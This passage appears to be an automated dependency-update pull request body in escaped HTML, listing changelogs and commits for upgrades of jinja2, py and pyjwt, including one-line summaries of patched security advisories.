href=\"https://github.com/pallets/jinja/security/advisories/GHSA-gmj6-6f8f-6699\"\u003eGHSA-gmj6-6f8f-6699\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSandbox does not allow \u003ccode\u003eclear\u003c/code\u003e and \u003ccode\u003epop\u003c/code\u003e on known mutable sequence types. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2032\"\u003e#2032\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCalling sync \u003ccode\u003erender\u003c/code\u003e for an async template uses \u003ccode\u003easyncio.run\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1952\"\u003e#1952\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid unclosed \u003ccode\u003eauto_aiter\u003c/code\u003e warnings. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReturn an \u003ccode\u003eaclose\u003c/code\u003e-able \u003ccode\u003eAsyncGenerator\u003c/code\u003e from \u003ccode\u003eTemplate.generate_async\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving \u003ccode\u003eroot_render_func()\u003c/code\u003e unclosed in \u003ccode\u003eTemplate.generate_async\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving async generators unclosed in blocks, includes and extends. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eThe runtime uses the correct \u003ccode\u003econcat\u003c/code\u003e function for the current environment when calling block references. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1701\"\u003e#1701\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake \u003ccode\u003e|unique\u003c/code\u003e async-aware, allowing it to be used after another async-aware filter. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1781\"\u003e#1781\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e|int\u003c/code\u003e filter handles \u003ccode\u003eOverflowError\u003c/code\u003e from scientific notation. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1921\"\u003e#1921\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake compiling deterministic for tuple unpacking in a \u003ccode\u003e{% set ... %}\u003c/code\u003e call. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2021\"\u003e#2021\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix dunder protocol (\u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e/etc) interaction with \u003ccode\u003eUndefined\u003c/code\u003e objects. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2025\"\u003e#2025\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e support for the internal \u003ccode\u003emissing\u003c/code\u003e object. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2027\"\u003e#2027\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eEnvironment.overlay(enable_async)\u003c/code\u003e is applied correctly. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2061\"\u003e#2061\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eThe error message from \u003ccode\u003eFileSystemLoader\u003c/code\u003e includes the paths that were searched. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1661\"\u003e#1661\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePackageLoader\u003c/code\u003e shows a clearer error message when the package does not contain the templates directory. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1705\"\u003e#1705\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImprove annotations for methods returning copies. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1880\"\u003e#1880\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eurlize\u003c/code\u003e does not add \u003ccode\u003emailto:\u003c/code\u003e to values like \u003ccode\u003e@a@b\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1870\"\u003e#1870\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTests decorated with \u003ccode\u003e@pass_context\u003c/code\u003e can be used with the \u003ccode\u003e|select\u003c/code\u003e filter. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1624\"\u003e#1624\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUsing \u003ccode\u003eset\u003c/code\u003e for multiple assignment (\u003ccode\u003ea, b = 1, 2\u003c/code\u003e) does not fail when the target is a namespace attribute. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1413\"\u003e#1413\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUsing \u003ccode\u003eset\u003c/code\u003e in all branches of \u003ccode\u003e{% if %}{% elif %}{% else %}\u003c/code\u003e blocks does not cause the variable to be considered initially undefined. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1253\"\u003e#1253\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.4\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.4 security release, which fixes security issues and bugs but does not otherwise change behavior and should not result in breaking changes.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.4/\"\u003ehttps://pypi.org/project/Jinja2/3.1.4/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/en/3.1.x/changes/#version-3-1-4\"\u003ehttps://jinja.palletsprojects.com/en/3.1.x/changes/#version-3-1-4\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003exmlattr\u003c/code\u003e filter does not allow keys with \u003ccode\u003e/\u003c/code\u003e solidus, \u003ccode\u003e\u0026gt;\u003c/code\u003e greater-than sign, or \u003ccode\u003e=\u003c/code\u003e equals sign, in addition to disallowing spaces. Regardless of any validation done by Jinja, user input should never be used as keys to this filter, or must be separately validated first. GHSA-h75v-3vvj-5mfj\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.3\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the 3.1.x feature branch.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95\"\u003eGHSA-h5c8-rqwp-cp95\u003c/a\u003e. You are affected if you are using \u003ccode\u003exmlattr\u003c/code\u003e and passing user input as attribute keys.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/jinja/blob/main/CHANGES.rst\"\u003ejinja2's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 3.1.6\u003c/h2\u003e\n\u003cp\u003eReleased 2025-03-05\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003e|attr\u003c/code\u003e filter does not bypass the environment's attribute lookup,\nallowing the sandbox to apply its checks. :ghsa:\u003ccode\u003ecpwx-vrp4-4pq7\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 3.1.5\u003c/h2\u003e\n\u003cp\u003eReleased 2024-12-21\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe sandboxed environment handles indirect calls to \u003ccode\u003estr.format\u003c/code\u003e, such as\nby passing a stored reference to a filter that calls its argument.\n:ghsa:\u003ccode\u003eq2x7-8rv6-6q7h\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eEscape template name before formatting it into error messages, to avoid\nissues with names that contain f-string syntax.\n:issue:\u003ccode\u003e1792\u003c/code\u003e, :ghsa:\u003ccode\u003egmj6-6f8f-6699\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eSandbox does not allow \u003ccode\u003eclear\u003c/code\u003e and \u003ccode\u003epop\u003c/code\u003e on known mutable sequence\ntypes. :issue:\u003ccode\u003e2032\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eCalling sync \u003ccode\u003erender\u003c/code\u003e for an async template uses \u003ccode\u003easyncio.run\u003c/code\u003e.\n:pr:\u003ccode\u003e1952\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid unclosed \u003ccode\u003eauto_aiter\u003c/code\u003e warnings. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eReturn an \u003ccode\u003eaclose\u003c/code\u003e-able \u003ccode\u003eAsyncGenerator\u003c/code\u003e from\n\u003ccode\u003eTemplate.generate_async\u003c/code\u003e. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving \u003ccode\u003eroot_render_func()\u003c/code\u003e unclosed in\n\u003ccode\u003eTemplate.generate_async\u003c/code\u003e. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving async generators unclosed in blocks, includes and extends.\n:pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eThe runtime uses the correct \u003ccode\u003econcat\u003c/code\u003e function for the current environment\nwhen calling block references. :issue:\u003ccode\u003e1701\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMake \u003ccode\u003e|unique\u003c/code\u003e async-aware, allowing it to be used after another\nasync-aware filter. :issue:\u003ccode\u003e1781\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e|int\u003c/code\u003e filter handles \u003ccode\u003eOverflowError\u003c/code\u003e from scientific notation.\n:issue:\u003ccode\u003e1921\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMake compiling deterministic for tuple unpacking in a \u003ccode\u003e{% set ... %}\u003c/code\u003e\ncall. :issue:\u003ccode\u003e2021\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix dunder protocol (\u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e/etc) interaction with \u003ccode\u003eUndefined\u003c/code\u003e\nobjects. :issue:\u003ccode\u003e2025\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e support for the internal \u003ccode\u003emissing\u003c/code\u003e object.\n:issue:\u003ccode\u003e2027\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eEnvironment.overlay(enable_async)\u003c/code\u003e is applied correctly. :pr:\u003ccode\u003e2061\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eThe error message from \u003ccode\u003eFileSystemLoader\u003c/code\u003e includes the paths that were\nsearched. :issue:\u003ccode\u003e1661\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePackageLoader\u003c/code\u003e shows a clearer error message when the package does not\ncontain the templates directory. :issue:\u003ccode\u003e1705\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eImprove annotations for methods returning copies. :pr:\u003ccode\u003e1880\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eurlize\u003c/code\u003e does not add \u003ccode\u003emailto:\u003c/code\u003e to values like \u003ccode\u003e@a@b\u003c/code\u003e. :pr:\u003ccode\u003e1870\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/15206881c006c79667fe5154fe80c01c65410679\"\u003e\u003ccode\u003e1520688\u003c/code\u003e\u003c/a\u003e release version 3.1.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/90457bbf33b8662926ae65cdde4c4c32e756e403\"\u003e\u003ccode\u003e90457bb\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/065334d1ee5b7210e1a0a93c37238c86858f2af7\"\u003e\u003ccode\u003e065334d\u003c/code\u003e\u003c/a\u003e attr filter uses env.getattr\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/033c20015c7ca899ab52eb921bb0f08e6d3dd145\"\u003e\u003ccode\u003e033c200\u003c/code\u003e\u003c/a\u003e start version 3.1.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/bc68d4efa99c5f77334f0e519628558059ae8c35\"\u003e\u003ccode\u003ebc68d4e\u003c/code\u003e\u003c/a\u003e use global contributing guide (\u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2070\"\u003e#2070\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/247de5e0c5062a792eb378e50e13e692885ee486\"\u003e\u003ccode\u003e247de5e\u003c/code\u003e\u003c/a\u003e use global contributing guide\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/ab8218c7a1b66b62e0ad6b941bd514e3a64a358f\"\u003e\u003ccode\u003eab8218c\u003c/code\u003e\u003c/a\u003e use project advisory link instead of global\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/b4ffc8ff299dfd360064bea4cd2f862364601ad2\"\u003e\u003ccode\u003eb4ffc8f\u003c/code\u003e\u003c/a\u003e release version 3.1.5 (\u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2066\"\u003e#2066\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/877f6e51be8e1765b06d911cfaa9033775f051d1\"\u003e\u003ccode\u003e877f6e5\u003c/code\u003e\u003c/a\u003e release version 3.1.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/8d588592653b052f957b720e1fc93196e06f207f\"\u003e\u003ccode\u003e8d58859\u003c/code\u003e\u003c/a\u003e remove test pypi\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pallets/jinja/compare/2.10.1...3.1.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `py` from 1.5.2 to 1.11.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytest-dev/py/blob/master/CHANGELOG.rst\"\u003epy's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.11.0 (2021-11-04)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSupport Python 3.11\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003eNO_COLOR\u003c/code\u003e environment variable\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.5 =\u0026gt; 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.10.0 (2020-12-12)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix a regular expression DoS vulnerability in the py.path.svnwc SVN blame functionality (CVE-2020-29651)\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.4 =\u0026gt; 1.5\u003c/li\u003e\n\u003cli\u003eUpdate vendored iniconfig: 1.0.0 =\u0026gt; 1.1.1\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.9.0 (2020-06-24)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eAdd type annotation stubs for the following modules:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epy.error\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.iniconfig\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.path\u003c/code\u003e (not including SVN paths)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.io\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.xml\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThere are no plans to type other modules at this time.\u003c/p\u003e\n\u003cp\u003eThe type annotations are provided in external .pyi files, not inline in the\ncode, and may therefore contain small errors or omissions. If you use \u003ccode\u003epy\u003c/code\u003e\nin conjunction with a type checker, and encounter any type errors you believe\nshould be accepted, please report it in an issue.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.2 (2020-06-15)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eOn Windows, \u003ccode\u003epy.path.local\u003c/code\u003es which differ only in case now have the same\nPython hash value. Previously, such paths were considered equal but had\ndifferent hashes, which is not allowed and breaks the assumptions made by\ndicts, sets and other users of hashes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.1 (2019-12-27)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eHandle \u003ccode\u003eFileNotFoundError\u003c/code\u003e when trying to import pathlib in \u003ccode\u003epath.common\u003c/code\u003e\non Python 3.4 (\u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/207\"\u003e#207\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003epy.path.local.samefile\u003c/code\u003e now works correctly in Python 3 on Windows when dealing with symlinks.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.0 (2019-02-21)\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/447bac514febbb5433963582103d48bb27b3db17\"\u003e\u003ccode\u003e447bac5\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/6d003d9fee08542b9a5ca663568cb30c75d6c27c\"\u003e\u003ccode\u003e6d003d9\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/9cf613f3c21ca31f4a1ee9a70e6bd31dc3fe42d9\"\u003e\u003ccode\u003e9cf613f\u003c/code\u003e\u003c/a\u003e Declare support for Python 3.8-3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/d831150a3502363c9ca7242122d8e6cbd229169e\"\u003e\u003ccode\u003ed831150\u003c/code\u003e\u003c/a\u003e Update python_requires: Python 3.4 was already dropped\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e68532e9d67b089b17f1c96a708ff5f8ccf8bc8b\"\u003e\u003ccode\u003ee68532e\u003c/code\u003e\u003c/a\u003e Update CHANGELOG for 1.11.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/2f03e5a7fd9eb95db110cfd1bf40b987757f9d48\"\u003e\u003ccode\u003e2f03e5a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/258\"\u003e#258\u003c/a\u003e from blueyed/NO_COLOR\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e116b2bb8e1da9e8aef33c3606bd3d357ae28570\"\u003e\u003ccode\u003ee116b2b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/275\"\u003e#275\u003c/a\u003e from pytest-dev/upgrade-vendor-libs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f3a1a59d7d701a76680c2d0b0bd582311b00ded0\"\u003e\u003ccode\u003ef3a1a59\u003c/code\u003e\u003c/a\u003e remove build pin again\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f6cbf2814a2cc355d0a795233a32dc1285eec93b\"\u003e\u003ccode\u003ef6cbf28\u003c/code\u003e\u003c/a\u003e try to use pipx tox\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/3fe9ad76257860bfcdb25a23539972759ce348ed\"\u003e\u003ccode\u003e3fe9ad7\u003c/code\u003e\u003c/a\u003e try to use preinstalled tox\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytest-dev/py/compare/1.5.2...1.11.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pyjwt` from 1.5.3 to 2.4.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/releases\"\u003epyjwt's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.4.0\u003c/h2\u003e\n\u003ch2\u003eSecurity\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[CVE-2022-29217] Prevent key confusion through non-blocklisted public key formats. \u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-ffqj-6fqr-9h24\"\u003ehttps://github.com/jpadilla/pyjwt/security/advisories/GHSA-ffqj-6fqr-9h24\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for Python 3.10 by \u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/699\"\u003ejpadilla/pyjwt#699\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDon't use implicit optionals by \u003ca href=\"https://github.com/rekyungmin\"\u003e\u003ccode\u003e@​rekyungmin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/705\"\u003ejpadilla/pyjwt#705\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[pre-commit.ci] pre-commit autoupdate by \u003ca href=\"https://github.com/pre-commit-ci\"\u003e\u003ccode\u003e@​pre-commit-ci\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/708\"\u003ejpadilla/pyjwt#708\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[pre-commit.ci] pre-commit autoupdate by \u003ca href=\"https://github.com/pre-commit-ci\"\u003e\u003ccode\u003e@​pre-commit-ci\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/710\"\u003ejpadilla/pyjwt#710\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[pre-commit.ci] pre-commit autoupdate by \u003ca href=\"https://github.com/pre-commit-ci\"\u003e\u003ccode\u003e@​pre-commit-ci\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/711\"\u003ejpadilla/pyjwt#711\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[pre-commit.ci] pre-commit autoupdate by \u003ca href=\"https://github.com/pre-commit-ci\"\u003e\u003ccode\u003e@​pre-commit-ci\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/712\"\u003ejpadilla/pyjwt#712\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edocumentation fix: show correct scope for decode_complete() by \u003ca href=\"https://github.com/sseering\"\u003e\u003ccode\u003e@​sseering\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/661\"\u003ejpadilla/pyjwt#661\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[pre-commit.ci] pre-commit autoupdate by \u003ca href=\"https://github.com/pre-commit-ci\"\u003e\u003ccode\u003e@​pre-commit-ci\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/716\"\u003ejpadilla/pyjwt#716\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eExplicit check the key for ECAlgorithm by \u003ca href=\"https://github.com/estin\"\u003e\u003ccode\u003e@​estin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/713\"\u003ejpadilla/pyjwt#713\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[pre-commit.ci] pre-commit autoupdate by \u003ca href=\"https://github.com/pre-commit-ci\"\u003e\u003ccode\u003e@​pre-commit-ci\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/720\"\u003ejpadilla/pyjwt#720\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eapi_jwk: Add PyJWKSet.\u003cstrong\u003egetitem\u003c/strong\u003e by \u003ca href=\"https://github.com/woodruffw\"\u003e\u003ccode\u003e@​woodruffw\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/725\"\u003ejpadilla/pyjwt#725\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate usage.rst by \u003ca href=\"https://github.com/guneybilen\"\u003e\u003ccode\u003e@​guneybilen\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/727\"\u003ejpadilla/pyjwt#727\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[pre-commit.ci] pre-commit autoupdate by \u003ca href=\"https://github.com/pre-commit-ci\"\u003e\u003ccode\u003e@​pre-commit-ci\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/728\"\u003ejpadilla/pyjwt#728\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: Update copyright information by \u003ca href=\"https://github.com/kkirsche\"\u003e\u003ccode\u003e@​kkirsche\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/729\"\u003ejpadilla/pyjwt#729\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDocs: mention performance reasons for reusing RSAPrivateKey when encoding by \u003ca href=\"https://github.com/dmahr1\"\u003e\u003ccode\u003e@​dmahr1\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/734\"\u003ejpadilla/pyjwt#734\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFixed typo in usage.rst by \u003ca href=\"https://github.com/israelabraham\"\u003e\u003ccode\u003e@​israelabraham\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/738\"\u003ejpadilla/pyjwt#738\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd detached payload support for JWS encoding and decoding by \u003ca href=\"https://github.com/fviard\"\u003e\u003ccode\u003e@​fviard\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/723\"\u003ejpadilla/pyjwt#723\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[pre-commit.ci] pre-commit autoupdate by \u003ca href=\"https://github.com/pre-commit-ci\"\u003e\u003ccode\u003e@​pre-commit-ci\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/740\"\u003ejpadilla/pyjwt#740\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRaise DeprecationWarning for jwt.decode(verify=...) by \u003ca href=\"https://github.com/akx\"\u003e\u003ccode\u003e@​akx\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/742\"\u003ejpadilla/pyjwt#742\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDon't mutate options dictionary in .decode_complete() by \u003ca href=\"https://github.com/akx\"\u003e\u003ccode\u003e@​akx\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/743\"\u003ejpadilla/pyjwt#743\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[pre-commit.ci] pre-commit autoupdate by \u003ca href=\"https://github.com/pre-commit-ci\"\u003e\u003ccode\u003e@​pre-commit-ci\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/748\"\u003ejpadilla/pyjwt#748\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReplace various string interpolations with f-strings by 